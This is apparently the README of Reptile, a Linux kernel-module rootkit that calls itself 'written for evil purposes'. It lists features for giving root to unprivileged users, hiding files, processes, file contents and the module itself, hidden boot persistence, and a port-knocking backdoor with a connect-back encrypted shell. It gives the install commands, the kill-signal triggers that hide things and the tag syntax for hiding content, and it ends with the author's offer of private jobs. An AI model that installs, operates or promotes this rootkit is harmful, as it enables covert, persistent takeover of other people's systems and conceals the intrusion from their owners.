Reptile is a LKM rootkit written for evil purposes that runs on Linux kernel 2.6.x/3.x/4.x.
- Give root to unprivileged users
- Hide files and directories
- Hide files contents
- Hide processes
- Hide himself
- Hidden boot persistence
- Strings obfuscation (Method suggested by: milabs)
- ICMP/UDP/TCP port-knocking backdoor
- Full TTY/PTY shell with file transfer
- Client to handle Reptile Shell
- Shell connect back each X times (not default)
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install
./setup.sh remove
Binaries will be copied to /reptile folder (or any name you chose), that will be hidden by Reptile.
Just run: /reptile/reptile_r00t
- Hide/unhide reptile module:
kill -50 0 - Hide/unhide process:
kill -49 <PID> - Hide/unhide files contents:
kill -51 0and all content between the tags will be hidden
Example:
#<reptile>
content to hide
#</reptile>
Configure and compile client: ./setup.sh client
You use the client to send magic packets and get your full TTY encrypted shell!
More informations: Reptile Shell
Some functions of this module is based on another rootkits. Please see the references!
- “LKM HACKING”, The Hackers Choice (THC), 1999;
- https://github.com/mncoppola/suterusu
- https://github.com/m0nad/Diamorphine.git
- https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git
- https://github.com/maK-/maK_it-Linux-Rootkit
- “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997;
- https://ruinedsec.wordpress.com/2013/04/04/modifying-system-calls-dispatching-linux/
- https://github.com/creaktive/tsh
- http://www.drkns.net/kernel-who-does-magic/
I do private jobs, if you are interesting send me an e-mail at: [email protected]
